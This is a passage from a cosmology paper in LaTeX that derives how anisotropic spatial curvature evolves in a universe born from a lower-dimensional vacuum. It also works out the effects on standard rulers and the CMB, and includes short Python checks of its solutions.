\section{Introduction and Summary}
\label{Sec:Intro}
Our current understanding of cosmology and high energy physics leaves many questions unanswered. One of the most fundamental of these questions is why our universe has three large dimensions. This may be tied to the more general question of the overall shape and structure of the universe. In fact, it is possible that our universe was not always three dimensional or that other places outside of our observable universe have a different dimensionality. There are surely long-lived vacua where one or more of our three dimensions are compactified, since this does not even rely on the presence of extra dimensions and indeed happens in the Standard Model \cite{ArkaniHamed:2007gg}. Eternal inflation can provide a means to populate these vacua, and naturally leads to a highly inhomogeneous universe on very long length scales. Further, it seems likely that these lower-dimensional vacua are at least as numerous as three-dimensional ones, since there are generally more ways to compactify a greater number of spatial dimensions. If we do indeed have a huge landscape of vacua (e.g.~\cite{Bousso:2000xa}) then it seems all the more reasonable that there should be vacua of all different dimensionalities and transitions between them (see e.g.~\cite{Krishnan:2005su, Carroll:2009dn, BlancoPillado:2009di, BlancoPillado:2009mi, Wu:2003ht}). We will ignore the subtle issues of the likelihood of populating those vacua (the ``measure problem"). Instead we will focus on the possibility of observing such regions of lower dimensionality, since surely such a discovery would have a tremendous effect on our understanding of cosmology and fundamental physics.
Our compact dimensions are generically unstable to decompactification \cite{Giddings:2004vr}. Thus it seems possible that the universe began with all the dimensions compact (the starting point in \cite{Brandenberger:1988aj, Greene:2009gp} for example). In this picture our current universe is one step in the chain towards decompactifying all dimensions. Of course, eternal inflation may lead to a very complicated history of populating different vacua, but in any case, it seems reasonable to consider the possibility that we came from a lower dimensional ``ancestor" vacuum. We will assume that prior to our last period of slow-roll inflation our patch of the universe was born in a transition from a lower dimensional vacuum.
Our universe then underwent the normal period of slow-roll inflation. For our signals to be observable we will assume that there were not too many more than the minimal number of efolds of inflation necessary to explain the CMB sky. This may be reasonable because this is very near a catastrophic boundary: large scale structures such as galaxies would not form if inflation did not last long enough to dilute curvature sufficiently \cite{Vilenkin:1996ar, Garriga:1998px, Freivogel:2005vv}. Since achieving slow-roll inflation is difficult and the longer it lasts the more tuned the potential often is, there may be a pressure to be close to this lower bound on the length of inflation. We will actually use the energy density in curvature, $\Omega_k$, in place of the number of efolds of inflation. The observational bound requires that $\Omega_k \lesssim 10^{-2}$ today (this corresponds to $\sim 62$ efolds for high scale inflation). The existence of galaxies requires $\Omega_k \lesssim 1$ today (corresponding to $\sim 59.5$ efolds if we use the bound from \cite{Freivogel:2005vv}). Thus $\Omega_k$ may be close to the observational bound today. Other, similar arguments have also been made for a relatively large curvature today \cite{Bozek:2009gh}.
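The translation between these two bounds on $\Omega_k$ and the quoted efold counts can be made explicit with a rough estimate (ours, not from the original text): since curvature dilutes as $\Omega_k \propto a^{-2} \propto e^{-2N}$ during inflation while the post-inflationary history is held fixed, the gap in efolds between the two bounds is
\begin{equation}
\Delta N \, = \, \frac{1}{2} \ln \frac{\Omega_k^{\rm max}}{\Omega_k^{\rm obs}} \, \approx \, \frac{1}{2} \ln \frac{1}{10^{-2}} \, \approx \, 2.3,
\end{equation}
roughly consistent with the $\sim 2.5$ efold difference between the two numbers quoted above.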
Most signals of the presence of other vacua, e.g.~bubble collisions \cite{Aguirre:2007an, Chang:2007eq, Chang:2008gj}, also rely on this assumption. These signals have also mostly been explored assuming that the other vacua are all 3+1 dimensional. While an important first step, this seems like a serious oversimplification. We find interesting differences in the case that our parent vacuum was lower dimensional. In particular, our universe can be anisotropic, with different spatial curvatures in the different directions. This anisotropic curvature dilutes exponentially during inflation, making the universe appear very isotropic at early times. However, this curvature ($\Omega_k$) grows at late times, leading to several observable effects. This anisotropic curvature sources an anisotropy in the Hubble expansion rate, since the different dimensions expand at different rates. The most interesting signal is an anisotropy in the normal CMB curvature measurement. The angular size of a ``standard ruler" now appears to depend on the orientation of that ruler. In the CMB this shows up as unexpected correlations between modes of all angular sizes. Unlike the normal curvature measurement, this anisotropic curvature measurement is not degenerate with the scale factor expansion history and is thus easier to measure. This anisotropic curvature also leads to a significant quadrupolar anisotropy in the CMB which constrains the size of $\Omega_k$. There are possibly other observables from 21 cm measurements, direct measurements of the Hubble expansion (e.g.~from supernovae), or from searches looking for nontrivial topology of the universe.
\section{The Anisotropic Universe}
\label{Sec: metric}
In this section we will compute the evolution of a universe that began with one or two of our three spatial dimensions compactified.
\subsection{The Initial Transition}
We will consider the possibility that our universe began in a lower-dimensional vacuum. In particular we assume that just prior to our recent period of slow-roll inflation, the currently observable part of the universe (our ``pocket universe" in landscape terminology) was in a vacuum with only one or two large, uncompactified spatial dimensions. The other dimensions, including the one or two that will eventually become part of our three large spatial dimensions, are compactified and stable. The universe then tunnels, nucleating a bubble of our vacuum in which three spatial dimensions are uncompactified and thus free to grow with the cosmological expansion. We will consider starting from either a 1+1 or 2+1 dimensional vacuum. We will not consider the 0+1 dimensional case in great detail, as it is significantly different \cite{ArkaniHamed:2007gg}. However it is possible that it will have the same type of signatures as we discuss for the other two cases, depending on the details of the compactification manifold.
Consider first the case that the universe is initially 2+1 dimensional, and in the tunneling event one of the previously compactified spatial dimensions becomes decompactified, losing whatever forces were constraining it and becoming free to grow (in the tunneling event it may also grow directly). We can think of this as a radion for that dimension which is initially trapped in a local minimum, tunneling to a section of its potential where it is free to roll. Of course, the tunneling event may actually be due to a change in the fluxes wrapping the compact dimension, or in general to a change in whatever is stabilizing that dimension. The exact nature of this tunneling will not concern us since the further evolution of the universe is relatively insensitive to this. In all cases a bubble of the new vacuum is formed in the original 2+1 dimensional space. The bubble wall (which is topologically an $S^1$ not an $S^2$) expands outward. The interior of this Coleman-De Luccia bubble \cite{Coleman:1980aw} is an infinite, open universe with negative spatial curvature (see e.g.~\cite{Bousso:2005yd} for this bubble in arbitrary dimensionality space-times). But this negative spatial curvature is only in two dimensions. The third, previously small, dimension may be topologically an $S^1$ or an interval, but in any case will not have spatial curvature. Thus the metric after the tunneling inside the bubble is
\begin{equation}
\label{eqn:anisotropic metric}
ds^2 = dt^2 - a(t)^2 \left( \frac{dr^2}{1-k r^2} + r^2 d \phi^2 \right) - b(t)^2 dz^2
\end{equation}
where $z$ is the coordinate of the previously compactified dimension and $k=-1$ for negative spatial curvature in the $r$-$\phi$ plane. This is known as a Bianchi III spacetime.
If instead the universe is initially 1+1 dimensional and two spatial dimensions decompactify in the transition then the situation will be reversed. The single originally large dimension (now labelled with coordinate $z$) will be flat but the other two dimensions may have curvature (either positive or negative). For example, if they were compactified into an $S^2$ they would have positive curvature and so would be described by Eqn.~\eqref{eqn:anisotropic metric} with $k=+1$, known as a Kantowski-Sachs spacetime. Or if those two dimensions were a compact hyperbolic manifold, for example, they would be negatively curved with $k=-1$. In fact, generically compactifications do have curvature in the extra dimensions (see for example \cite{Silverstein:2004id}). Of course it is also possible that the two compact dimensions had zero spatial curvature. We will not consider this special case in great detail since it does not lead to most of our observable signals.
\subsection{Evolution of the Anisotropic Universe}
We will thus assume that our universe begins with anisotropic spatial curvature, with metric as in Eqn.~\eqref{eqn:anisotropic metric}. Immediately after the tunneling event the universe is curvature dominated, though in this case of course the curvature is only in the $r$-$\phi$ plane. We assume the universe then goes through the usual period of slow-roll inflation, with a low number of efolds, $\lesssim 70$, near the lower bound set by curvature.
The equations of motion (the ``FRW equations") are:
\begin{eqnarray}
\label{eqn: FRW eqn1}
\frac{\dot{a}^2}{a^2} + 2 \frac{\dot{a}}{a} \frac{\dot{b}}{b} + \frac{k}{a^2} & = & 8 \pi G \rho \\
\label{eqn: FRW eqn2}
\frac{\ddot{a}}{a} + \frac{\ddot{b}}{b} + \frac{\dot{a}}{a} \frac{\dot{b}}{b} & = & - 8 \pi G p_r \\
\label{eqn: FRW eqn3}
2 \frac{\ddot{a}}{a} + \frac{\dot{a}^2}{a^2} + \frac{k}{a^2} & = & - 8 \pi G p_z
\end{eqnarray}
where the dot $\dot{\,}$ denotes $\frac{d}{dt}$, $\rho$ is the energy density, and $p_r$ and $p_z$ are the pressures in the $r$ and $z$ direction, i.e.~the $rr$ and $zz$ components of the stress tensor $T^\mu_\nu$. These can be rewritten in terms of the two Hubble parameters $H_a \equiv \frac{\dot{a}}{a}$ and $H_b \equiv \frac{\dot{b}}{b}$ as
\begin{eqnarray}
\label{eqn: FRW H eqn1}
H_a^2 + 2 H_a H_b + \frac{k}{a^2} & = & 8 \pi G \rho \\
\label{eqn: FRW H eqn2}
\dot{H_a} + H_a^2 + \dot{H_b} + H_b^2 + H_a H_b & = & - 8 \pi G p_r \\
\label{eqn: FRW H eqn3}
2 \dot{H_a} + 3 H_a^2 + \frac{k}{a^2} & = & - 8 \pi G p_z
\end{eqnarray}
At least in the case of tunneling from 2+1 to 3+1 dimensions, immediately after the tunneling event the universe is curvature dominated. In this case Eqn.~\eqref{eqn: FRW eqn3} can be solved for $a$ directly. Since this is just the usual isotropic FRW equation, the solution is as usual $a(t) \sim t$, where $t = 0$ is the bubble wall. Actually, since we will assume the universe transitions to a period of slow-roll inflation after curvature dominance, we will assume there is a subdominant vacuum energy during the period of curvature dominance. This then gives a perturbative solution, accurate up to linear order in the vacuum energy $\Lambda$, of $a(t) \approx t \left( 1 + \frac{4 \pi}{9} G \Lambda t^2 \right)$. Then we can solve Eqn.~\eqref{eqn: FRW eqn1} perturbatively for $b(t)$. There are several possible solutions but these are reduced because we will assume that immediately after the tunneling event $\dot{b} = 0$. If we imagine the transition as a radion field tunneling through a potential barrier then we know that the radion generically starts from rest after the tunneling. With this boundary condition the solution to linear order in the vacuum energy is $b(t) \approx b_i \left( 1 + \frac{4 \pi}{3} G \Lambda t^2 \right)$ where $b_i$ is the initial value of $b$. Since the period of curvature dominance ends when $t^2 G \Lambda \sim 1$, we see that roughly $a$ expands linearly while $b$ remains fixed during this period. Thus the expansion rates remain very different during this period: $H_a$ is large while $H_b \approx 0$. The flat dimension will not begin growing rapidly until inflation begins. At that point though, it will be driven rapidly towards the same expansion rate as the other dimensions, $H_a \approx H_b$, as we will now show.
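These perturbative solutions can be cross-checked numerically. The sketch below (all parameter values are illustrative choices of ours, in units with $G = 1$) evolves $a$ and $H_a$ using Eqn.~\eqref{eqn: FRW eqn3}, obtains $H_b$ algebraically from the constraint Eqn.~\eqref{eqn: FRW H eqn1}, and compares the result against $a(t) \approx t \left( 1 + \frac{4 \pi}{9} G \Lambda t^2 \right)$ and $b(t) \approx b_i \left( 1 + \frac{4 \pi}{3} G \Lambda t^2 \right)$ deep in the curvature-dominated era:

```python
import numpy as np
from scipy.integrate import solve_ivp

# illustrative parameters (our choice): G = 1, small vacuum energy, k = -1
G, Lam, k, b_i = 1.0, 1e-4, -1.0, 1.0
rho = Lam  # vacuum energy only, so p_r = p_z = -Lam

def rhs(t, y):
    a, Ha, b = y
    # z-direction equation: 2*Ha' + 3*Ha^2 + k/a^2 = -8 pi G p_z = 8 pi G Lam
    dHa = 0.5 * (8 * np.pi * G * Lam - k / a**2 - 3 * Ha**2)
    # constraint: Ha^2 + 2 Ha Hb + k/a^2 = 8 pi G rho, solved for Hb
    Hb = (8 * np.pi * G * rho - Ha**2 - k / a**2) / (2 * Ha)
    return [a * Ha, dHa, b * Hb]

# integrate through curvature dominance (G*Lam*t^2 << 1 throughout)
t0, t1 = 1e-3, 1.0
sol = solve_ivp(rhs, (t0, t1), [t0, 1 / t0, b_i], rtol=1e-10, atol=1e-12)
a_num, _, b_num = sol.y[:, -1]

# perturbative solutions, linear in G*Lam
a_pert = t1 * (1 + 4 * np.pi / 9 * G * Lam * t1**2)
b_pert = b_i * (1 + 4 * np.pi / 3 * G * Lam * t1**2)
print(abs(a_num / a_pert - 1), abs(b_num / b_pert - 1))  # both tiny
```

The fractional deviations are set by the neglected $\mathcal{O}\left( (G \Lambda t^2)^2 \right)$ terms, so $a$ indeed grows linearly while $b$ barely moves during curvature dominance.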
Since our observed universe is approximately isotropic, we will only need to solve these equations in the limit of small $\Delta H \equiv H_a - H_b$. We will always work to linear order in $\Delta H$. Subtracting Eqn.~\eqref{eqn: FRW H eqn2} - Eqn.~\eqref{eqn: FRW H eqn3} gives
\begin{equation}
\label{eqn: delta H}
\frac{d}{dt} \Delta{H} + 3 H_a \, \Delta H + \frac{k}{a^2} = 8 \pi G \left( p_r - p_z \right) \approx 0
\end{equation}
Note that we have taken the pressure to be isotropic, $p_r = p_z \equiv p$, which is approximately true in all cases of interest to us. This is clearly true during inflation. During radiation dominance (RD) the radiation is in thermal equilibrium. Since the reactions keeping it in equilibrium have rates much higher than the Hubble scales during this time, the pressure is kept locally isotropic. During matter dominance (MD) the pressure is zero to leading order. The sub-leading order piece due to the photons will also remain isotropic until after decoupling since the photons remain in equilibrium until this time. After decoupling the energy density in radiation is quite small compared to the matter density. Further, this small pressure only develops anisotropy due to the differential expansion (and hence redshifting) between the $r$ and $z$ directions. Thus the anisotropy in pressure is proportional to both $\Delta H$ and the small overall size of the pressure and is therefore negligible for us.
The anisotropic spatial curvature in the metric \eqref{eqn:anisotropic metric} is the only effect breaking isotropy in this universe and thus the only reason for a differential expansion rate $\Delta H$. In fact, as we will see shortly, the differential expansion $\Delta H$ is proportional to $\Omega_k$, the curvature energy density, defined to be
\begin{equation}
\Omega_k \equiv \frac{k}{a^2 H_a^2}.
\end{equation}
Since $\Omega_k$ grows during RD and MD and it is $\ll 1$ today, it was quite small during the entire history of the universe after the period of curvature dominance (to which we will return later). So we will treat both $\Delta H$ and $\Omega_k$ as our small parameters and work to linear order in each.
If we combine Eqns.~\eqref{eqn: FRW H eqn3} and \eqref{eqn: delta H} we find an equation for $H_b$ which is true in the limit of small $\Delta H$
\begin{equation}
2 \dot{H_b} + 3 H_b^2 - \frac{k}{a^2} = - 8 \pi G p.
\end{equation}
Notice that this is exactly the same as the equation for $H_a$ (Eqn.~\eqref{eqn: FRW H eqn3}) but with the sign of the curvature term flipped. Eqn.~\eqref{eqn: FRW H eqn3} for $H_a$ is just the usual isotropic FRW equation. Thus $a(t)$ behaves exactly as it would in the normal isotropic universe with a subleading curvature component and $b(t)$ behaves as if it was the scale factor in a universe with an equal magnitude but opposite sign of curvature.
Eqn.~\eqref{eqn: delta H} is straightforward to solve because we only need the leading-order behavior of $a$ and $H_a$: since Eqns.~\eqref{eqn: FRW eqn3} and \eqref{eqn: FRW H eqn3} are just the usual FRW equations, $a$ and $H_a$ take the usual isotropic FRW form. Solving Eqn.~\eqref{eqn: delta H} during the eras of interest and keeping only the inhomogeneous solutions yields
\begin{eqnarray}
\text{Inflation:} \quad \frac{\Delta H}{H_a} & = & - \Omega_k \\
\text{RD:} \quad \frac{\Delta H}{H_a} & = & - \frac{1}{3} \Omega_k \\
\text{MD:} \quad \frac{\Delta H}{H_a} & = & - \frac{2}{5} \Omega_k
\end{eqnarray}
As we will show later, the homogeneous solutions all die off as faster functions of time and are thus negligible. Interestingly, this implies that $\Delta H$ is effectively independent of initial conditions. At every transition some of the homogeneous solution for $\Delta H$ is sourced, for example to make up the missing $- \frac{2}{3} \Omega_k$ when transitioning from inflation to RD. But this homogeneous piece dies off faster, leaving only the inhomogeneous piece which is independent of the initial value of $\Delta H$.
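Both the matter-dominated coefficient $-\frac{2}{5}$ and the independence from initial conditions can be checked numerically by treating Eqn.~\eqref{eqn: delta H} as a linear ODE for $\Delta H$ on the fixed leading-order MD background $a = c_0 t^{2/3}$, $H_a = \frac{2}{3 t}$. The sketch below (units and parameter values are our illustrative choices) integrates from several initial values of $\Delta H$ and finds the same asymptotic ratio:

```python
import numpy as np
from scipy.integrate import solve_ivp

c0, k = 1.0, 1.0  # illustrative units (our choice)

def a(t):  return c0 * t ** (2 / 3)   # leading-order MD scale factor
def Ha(t): return 2 / (3 * t)

# Eqn. (delta H): d(DeltaH)/dt + 3 Ha DeltaH + k/a^2 = 0
rhs = lambda t, dH: -3 * Ha(t) * dH - k / a(t) ** 2

ratios = []
for dH0 in (0.0, 0.5, -0.5):   # result is independent of initial DeltaH
    sol = solve_ivp(rhs, (1.0, 1e6), [dH0], rtol=1e-10, atol=1e-15)
    t_f, dH_f = sol.t[-1], sol.y[0, -1]
    Omega_k = (k / a(t_f) ** 2) / Ha(t_f) ** 2
    ratios.append((dH_f / Ha(t_f)) / Omega_k)
print(ratios)  # each entry approaches -2/5
```

The homogeneous piece sourced by the "wrong" initial $\Delta H$ decays away, leaving only the inhomogeneous solution, exactly as described above.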
To find the solutions for the scale factors $a(t)$ and $b(t)$ up to linear (subleading) order in the curvature, we solve Eqns.~\eqref{eqn: FRW eqn1}, \eqref{eqn: FRW eqn2}, and \eqref{eqn: FRW eqn3} perturbatively in $\Omega_k$. The leading order behavior comes from the dominant energy density (vacuum energy, radiation, or matter in our three eras). We will only need the solution during MD so we can assume $p_r = p_z = 0$ then. Eqn.~\eqref{eqn: FRW eqn3} contains no $b$'s so it can be solved directly for $a(t)$. Once we have the solution for $a(t)$ up to linear order in $\Omega_k$ we then plug in to Eqn.~\eqref{eqn: FRW eqn2} to find $b(t)$ also to linear order. The solutions during MD to linear order in $\Omega_k$ are
\begin{eqnarray}
a(t) = c_0 \, t^\frac{2}{3} \left( 1 - \frac{9 k}{20 c_0^2} \, t^\frac{2}{3} \right) \approx c_0 \, t^\frac{2}{3} \left( 1 - \frac{\Omega_k}{5} \right) \\
b(t) = c_0 \, t^\frac{2}{3} \left( 1 + \frac{9 k}{20 c_0^2} \, t^\frac{2}{3} \right) \approx c_0 \, t^\frac{2}{3} \left( 1 + \frac{\Omega_k}{5} \right)
\end{eqnarray}
where $c_0$ is an arbitrary, physically meaningless constant arising from the coordinate rescaling symmetry.
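As a consistency check, one can verify with a computer algebra system that these expressions satisfy Eqns.~\eqref{eqn: FRW eqn2} and \eqref{eqn: FRW eqn3} with $p_r = p_z = 0$ through first order in the curvature $k$. A minimal sketch (symbol names are ours):

```python
import sympy as sp

t, c0 = sp.symbols('t c_0', positive=True)
k = sp.symbols('k', real=True)  # small expansion parameter; sign arbitrary

eps = sp.Rational(9, 20) * k / c0**2
a = c0 * t**sp.Rational(2, 3) * (1 - eps * t**sp.Rational(2, 3))
b = c0 * t**sp.Rational(2, 3) * (1 + eps * t**sp.Rational(2, 3))

# FRW equations with p_r = p_z = 0 (matter domination)
eq3 = 2 * sp.diff(a, t, 2) / a + (sp.diff(a, t) / a)**2 + k / a**2
eq2 = sp.diff(a, t, 2) / a + sp.diff(b, t, 2) / b \
      + (sp.diff(a, t) / a) * (sp.diff(b, t) / b)

# both must vanish at zeroth and first order in k
checks = [sp.simplify(sp.series(eq, k, 0, 2).removeO()) for eq in (eq3, eq2)]
print(checks)  # -> [0, 0]
```

Note that the $\mathcal{O}(k)$ pieces of $2 \ddot{a}/a + \dot{a}^2/a^2$ cancel against $k/a^2$ only for the coefficient $\frac{9}{20}$, and Eqn.~\eqref{eqn: FRW eqn2} is satisfied only because $a$ and $b$ carry opposite-sign corrections.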
Thus this universe always has a differential expansion rate between the $z$ direction and the $r$-$\phi$ directions which is proportional to $\Omega_k$. The precise constant of proportionality depends only on the era (inflation, RD, or MD) and not on initial conditions. Further, the $r$-$\phi$ plane expands as in the usual isotropic FRW universe, while the $z$ direction expands as if it was in that same universe except oppositely curved.
During an initial period of curvature dominance the $z$ dimension remains constant while the other two dimensions expand, diluting curvature. During this period the expansion rates $H_a$ and $H_b$ are maximally different. Then a period of slow-roll inflation takes over. During this period the expansion rates are driven exponentially close together. This difference in expansion rates is largest at the beginning of inflation, immediately after curvature dominance, when $\Omega_k$ is still large. During inflation curvature dilutes exponentially as $\Omega_k \propto a^{-2}$. So at the end of inflation the differential expansion rate is completely negligible $\frac{\Delta H}{H} \sim e^{-60}$. Then during RD $\Omega_k$ and hence also $\Delta H$ remain small, though growing as $\propto a^2$. During MD $\Omega_k$ and $\Delta H$ continue to grow $\propto a$, finally reaching their maximal value when the universe transitioned to vacuum energy dominance around redshift $\sim 2$. Since this final transition was so recent (and the homogeneous solution for $\Delta H$ has not even had much time to die off yet) we will approximate the universe as matter dominated until today.
\section{Observables}
\label{Sec: Observables}
In this section, we discuss the late time observables of anisotropic curvature. We begin by computing its effects on standard rulers. These effects emerge due to the warping of null geodesics in the anisotropic background metric. Null geodesics along different directions are warped differently by the curvature, leading to differences in the observed angular size of standard rulers in the sky. Following this discussion, we compute the effect of anisotropic curvature on the CMB. The CMB is also affected by the warping of the null geodesics that propagate from the surface of last scattering to the current epoch. This warping affects the relation between the angle at which a CMB photon is observed today and the point at which it was emitted during recombination. In addition to this effect, the anisotropic metric discussed in Section \ref{Sec: metric} also leads to differential Hubble expansion. This leads to an anisotropic redshift in the universe, which causes a late time observer to see additional temperature anisotropies in the CMB. We conclude the section with a discussion of additional measurements that could be performed in upcoming experiments.
\subsection{Standard Rulers}
\label{SubSec:Rulers}
In this section we present a calculation of the effect of anisotropic curvature on standard rulers. While this is not a directly observable effect itself, since we have no exact standard rulers in the sky, it does provide good intuition for the following calculation of the actual CMB observables in Section \ref{SubSec:CMB}. Further, many of the results of this section are used directly in that calculation.
The spacetimes \eqref{eqn:anisotropic metric} considered in this paper are curved and anisotropic. A canonical method to observe curvature is through the measurement of the angular sizes of standard rulers. Curvature modifies the Euclidean relationship between the measured angle and the linear size of the ruler. In a universe with anisotropic curvature, we expect this deviation from Euclidean geometry to change with the angular position and orientation of the ruler.
Motivated by the use of baryon acoustic oscillations as cosmological standard rulers, we compute the present day angular size of standard rulers located at the surface of last scattering. This calculation gives intuition for the effects of anisotropic curvature on the CMB (studied in detail in section \ref{SubSec:CMB}). To do so, we first determine the null geodesics that connect the surface of last scattering to a present day observer. The angle subtended between the two null geodesics that reach the end points of the standard ruler is then the angular size of the ruler. For simplicity, we assume that the universe was matter dominated throughout the period between recombination and the present epoch.
We work with the metric
\begin{eqnarray}
ds^{2} & = & dt^{2} - a\left( t \right)^{2} \left( dr^{2} + \sinh^{2}\left( r \right) d\phi^2 \right) - b\left( t \right)^2 dz^2
\label{Eqn:sinhmetric}
\end{eqnarray}
which results when a $3+1$ dimensional universe is produced by tunneling from a $2+1$ dimensional vacuum. We restrict our attention to this scenario in order to facilitate concrete computation. However, our results can be applied to a wide class of scenarios that lead to anisotropic geometries. The metric \eqref{Eqn:sinhmetric} describes a universe where two of the spatial dimensions (parameterized by the coordinates $\left( r, \phi \right)$ in \eqref{Eqn:sinhmetric}) have negative curvature and grow with scale factor $a\left( t \right)$. The other dimension, parameterized by the coordinate $z$ in \eqref{Eqn:sinhmetric}, grows with scale factor $b\left( t \right)$. The space-time geometry of such a universe can also be described using the metric \eqref{eqn:anisotropic metric} with $k = -1$. These metrics are related by a coordinate transformation and they yield identical FRW equations \eqref{eqn: FRW eqn1}, \eqref{eqn: FRW eqn2} and \eqref{eqn: FRW eqn3} for the scale factors $a\left( t \right)$ and $b\left( t \right)$. This setup also describes anisotropic universes with positive curvature (equation \eqref{eqn:anisotropic metric} with $k=+1$). Such a universe is described by the metric \eqref{Eqn:sinhmetric} with the $\sinh^{2}\left( r \right)$ term replaced by $\sin^{2}\left( r \right)$. With this metric, the FRW equations (\eqref{eqn: FRW eqn1}, \eqref{eqn: FRW eqn2} and \eqref{eqn: FRW eqn3}) and the null geodesic equations \eqref{Eqn:Geodesics} have the same parametric forms. Our calculations also apply to this case, with the difference between the two cases being captured by the sign of the curvature term $\Omega_k$.
\begin{figure}
\begin{center}
\includegraphics[width = 4.0 in]{geodesics.pdf}
\caption{ \label{Fig:geodesics} A depiction of the motion of a photon (red curve) from a point P on the surface of last scattering $\Sigma$ (black ellipse) to an observer O. Without loss in generality, the observer's position can be taken as the origin of the coordinate system. The anisotropic curvature causes $\Sigma$ to deviate from sphericity and warps the photon trajectories. $\theta_0$ is the angle between the photon's trajectory and the observer O's $z$ axis. $\theta_P$ is the angle between the photon's trajectory and the $z$ axis at $P$.}
\end{center}
\end{figure}
An observer O (see figure \ref{Fig:geodesics}) at the present time receives photons from the surface of last scattering $\Sigma$. Each such photon follows a null geodesic. In computing these null geodesics, we can assume without loss in generality that the point O lies at the origin of the coordinate system. With this choice, we focus on geodesics that lie along a direction of constant $\phi$. These geodesics contain all the information required to describe our setup. The geodesics that connect the point O with the surface of last scattering have zero velocity along the $\phi$ direction. The $O\left( 2 \right)$ symmetry in the $\left( r, \phi \right)$ plane then implies that $\phi$ remains constant during the subsequent evolution of the geodesic. Using the metric \eqref{Eqn:sinhmetric}, the null geodesic equations that describe the photon's trajectory $\left( r\left( t \right), z \left( t \right) \right)$ are
\begin{eqnarray}
\nonumber
\ddot{r} + \dot{r} H_a \left( 1 + \frac{\Delta H}{H_a} \left( 1 - \dot{r}^2 a\left( t \right)^2 \right) \right)& =&0 \\
\ddot{z} + \dot{z} H_b \left( 1 - \frac{\Delta H}{H_b} \left( 1 - \dot{z}^2 b\left( t \right)^2 \right) \right)& = &0
\label{Eqn:Geodesics}
\end{eqnarray}
where the dots denote derivatives with respect to $t$. With the boundary condition that the null geodesic reaches O at time $t_0$, equation \eqref{Eqn:Geodesics} can be solved perturbatively to leading order in $\Omega_k$. The coordinates $\left( r_P, z_P \right)$ on $\Sigma$ from which the photon is emitted are
\begin{eqnarray}
\nonumber
r_P &=& \sin \alpha \, \frac{3 \, t_0^{\frac{1}{3}}}{c_0} \, \left( 1 - \frac{\Omega_{k_0}}{3}\left( \frac{4}{5} + \cos 2 \alpha \right) \right) \\
z_P &=& \cos \alpha \, \frac{3 \, t_0^{\frac{1}{3}}}{c_0} \, \left( 1 - \frac{\Omega_{k_0}}{3}\left( -\frac{4}{5} + \cos 2 \alpha \right) \right)
\label{Eqn:Coordinates}
\end{eqnarray}
In the above expression, $\alpha$ is a parameter that governs the direction in the $\left( r, z \right)$ plane from which the photon is received at O and $\Omega_{k_0}$ denotes the fractional energy density in curvature at the present time. The physical angle $\theta$ between the photon's trajectory and the $z$ axis, as measured by a local observer, is different from $\alpha$, and is given by
\begin{eqnarray}
\tan \left(\theta\right) &=& \left( \frac{a\left( t \right)}{b\left( t \right)} \frac{dr}{dz}\right) + \mathcal{O} \left( H_a\right)
\label{Eqn:thetadefinition}
\end{eqnarray}
For the geodesics computed in \eqref{Eqn:Coordinates}, the relation between the parameter $\alpha$ and the physical angle $\theta_0$ observed at O is
\begin{eqnarray}
\tan \left(\theta_0\right) & = &\left( 1 - \frac{2}{5} \Omega_{k_0}\right) \, \tan \alpha
\end{eqnarray}
The $\mathcal{O} \left( H_a \right)$ corrections in the definition \eqref{Eqn:thetadefinition} arise because the coordinates $\left( t, r, \phi, z \right)$ used to describe the metric \eqref{Eqn:sinhmetric} are not locally flat. Local coordinates $\left( \tilde{t}, \tilde{r}, \tilde{\phi}, \tilde{z} \right)$ can be constructed at any point $\left( t_Q, r_Q, \phi_Q, z_Q \right)$ of the space-time. These two sets of coordinates are related by
\begin{eqnarray}
\nonumber
t & = & t_Q + \tilde{t} - \frac{1}{2}\left( a\left( t \right)^{2} H_a \left( \tilde{r}^2 + \sinh^{2}\left( r_Q \right) \, \tilde{\phi}^{2} \right) + b\left( t \right)^2 H_b \tilde{z}^2 \right) \\
\nonumber
r & = & r_Q + \tilde{r} - \frac{1}{2} \left( 2 \, H_a \, \tilde{r} \, \tilde{t} \, - \, \cosh \left( r_Q\right) \, \sinh \left( r_Q\right) \, \tilde{\phi}^2\right) \\
\nonumber
\phi & = & \phi_Q + \tilde{\phi} - \tilde{\phi} \left( H_a \, \tilde{t} \, + \, \coth \left( r_Q\right) \, \tilde{r} \right) \\
z & = & z_Q + \tilde{z} \left( 1 - H_b \, \tilde{t} \right)
\label{Eqn:LocalCoordinates}
\end{eqnarray}
The coordinate transformations in \eqref{Eqn:LocalCoordinates} imply that operators constructed from global coordinates ({\it e.g.} $\frac{d}{dr}$) differ from the corresponding operator in the local inertial frame ({\it e.g.} $\frac{d}{d\tilde{r}}$) by quantities $\sim \mathcal{O} \left( H_a \tilde{r}\right)$. The difference between these operators is suppressed by the ratio of the size of the local experiment over the Hubble radius. These differences are negligible for any local experiment today. The angle defined by \eqref{Eqn:thetadefinition} is therefore very close to the physical angle measured by a local experiment and we will use this definition for subsequent calculations.
\begin{figure}
\begin{center}
\includegraphics[width = 4.5 in]{rulers.pdf}
\caption{ \label{Fig:rulers} The effect of the anisotropic curvature on a measurement of the angular size of standard rulers. The black ellipse is the surface of recombination and the red lines are photon paths from standard rulers on this surface to the observer at O. The standard rulers are depicted by the thick straight lines. The angular size varies depending upon the location and orientation of the ruler.}
\end{center}
\end{figure}
With the knowledge of the geodesics \eqref{Eqn:Coordinates}, we can calculate the angular size of a standard ruler of length $\Delta L$ at the time of recombination. Since $\Omega_k$ is very small during this time, the physical size of the ruler is independent of its location and orientation. First, consider a ruler oriented in the $z$ direction. This ruler lies between the coordinates $\left( r \left( t_{r} \right), z \left( t_r \right) \right) $ and $\left( r \left( t_{r} \right) + \Delta r, z \left( t_r \right) + \Delta z\right)$ at the time $t_r$ of recombination. The length of this ruler is
\begin{eqnarray}
\left( a\left( t_r \right) \Delta r \right)^{2} + \left( b \left( t_r \right) \Delta z \right)^{2} & = & \Delta L ^2
\label{Eqn:RulerSize}
\end{eqnarray}
Using \eqref{Eqn:Coordinates} and \eqref{Eqn:thetadefinition} in \eqref{Eqn:RulerSize}, we find that the angular size $\Delta \theta$ subtended by a ruler of length $\Delta L$ at a local experiment O is
\begin{eqnarray}
\Delta \theta \left( \theta \right) & = & \frac{\Delta L}{3 \, t_r^{\frac{2}{3}} \, t_0^{\frac{1}{3}}} \left( 1 + \frac{\Omega_{k_0}}{5} \cos 2 \theta \right)
\label{Eqn:AngleChange}
\end{eqnarray}
A similar procedure can also be adopted to describe standard rulers that lie along the $\left( r, \phi \right)$ plane. The angular size of these rulers is given by the angle $\phi$ between the null geodesics that connect the ends of the ruler to the origin. Following the above procedure, this angular size $\Delta \phi$ is
\begin{eqnarray}
